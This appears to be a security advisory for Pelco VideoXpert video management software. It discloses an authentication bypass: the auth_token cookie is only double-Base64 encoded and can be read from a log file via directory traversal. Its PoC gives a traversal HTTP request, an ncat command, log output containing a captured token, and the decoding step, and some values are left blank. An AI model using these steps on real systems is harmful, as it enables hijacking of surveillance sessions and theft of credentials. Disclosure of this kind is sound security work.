### Summary
VideoXpert is a video management solution designed for scalability, fitting the needs surveillance operations of any size. VideoXpert Ultimate can also aggregate other VideoXpert systems, tying multiple video management systems into a single interface.
### Description
The software transmits sensitive data using double Base64 encoding for the Cookie 'auth_token' in a communication channel that can be sniffed by unauthorized actors or arbitrarely be read from the vxcore log file directly using directory traversal attack resulting in authentication bypass / session hijacking.
### Vendor
Schneider Electric SE - https://www.pelco.com
### Affected Version
* 2.0.41
* 1.14.7
* 1.12.105
### Tested On
Microsoft Windows 7 Professional SP1 (EN)
### PoC
After a user logs in, the web server creates a Cookie: auth_token which has the following value:
Base64 decoding that becomes:
Again decoding, gives us result:
PoC remote session takeover with directory traversal:
bash-4.4$ cat pelco_live.txt
GET /portal//..\\\..\\\..\\\..\\\ProgramData\Pelco\Core\core\vxcore.log HTTP/1.1
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.98 Safari/537.36
Content-Type: text/plain; charset=utf-8
Accept: */*
Accept-Language: en-US,en;q=0.8,mk;q=0.6
DNT: 1
bash-4.4$ ncat -v -n 80 < pelco_live.txt > vxcore_log.txt
bash-4.4$ cat vxcore_log.txt
INFO [2017-04-06 11:20:09.999] [HealthCheckMonitorPollingThread-0] org.mongodb.driver.connection: Closed connection [connectionId{localValue:400, serverValue:473}] to mongod0-rs1-dfde27ce-6a4f-413a-a7c2-6df855d462df:31001 because the pool has been closed.
INFO [2017-04-06 11:20:12.559] [dw-5099 - GET /portal/System.html?auth_token=ZXlKMWMyVnlibUZ0WlNJNkltRmtiV2x1SWl3aWNHRnpjM2R2Y21RaU9pSmhaRzFwYmpFeU15SXNJbVJ2YldGcGJpSTZJa3hQUTBGTUlpd2laWGh3YVhKbGN5STZNVFE1TVRVMU5qYzVOekUxT0N3aVlXZGxiblFpT2lJME1HWTJORE00TmkxbVptTXdMVFExTkRFdE9XTmpaQzFoTlRJeU0yUmlNbVpqTURraUxDSmpiR2xsYm5SSmNDSTZJakV5Tnk0d0xqQXVNU0o5] com.pelco.vms.webService.application.servlets.StaticContentServlet: Returning static content for URI /portal/System.html
INFO [2017-04-06 11:20:12.567] [dw-5055 - GET /portal/Lilac.css] com.pelco.vms.webService.application.servlets.StaticContentServlet: Returning static content for URI /portal/Lilac.css
INFO [2017-04-06 11:20:12.568] [dw-5098 - GET /portal/lilac/lilac.nocache.js] com.pelco.vms.webService.application.servlets.StaticContentServlet: Returning static content for URI /portal/lilac/lilac.nocache.js
bash-4.4$ cat pelco_auth_token.txt
bash-4.4$ base64 -D pelco_auth_token.txt |base64 -D -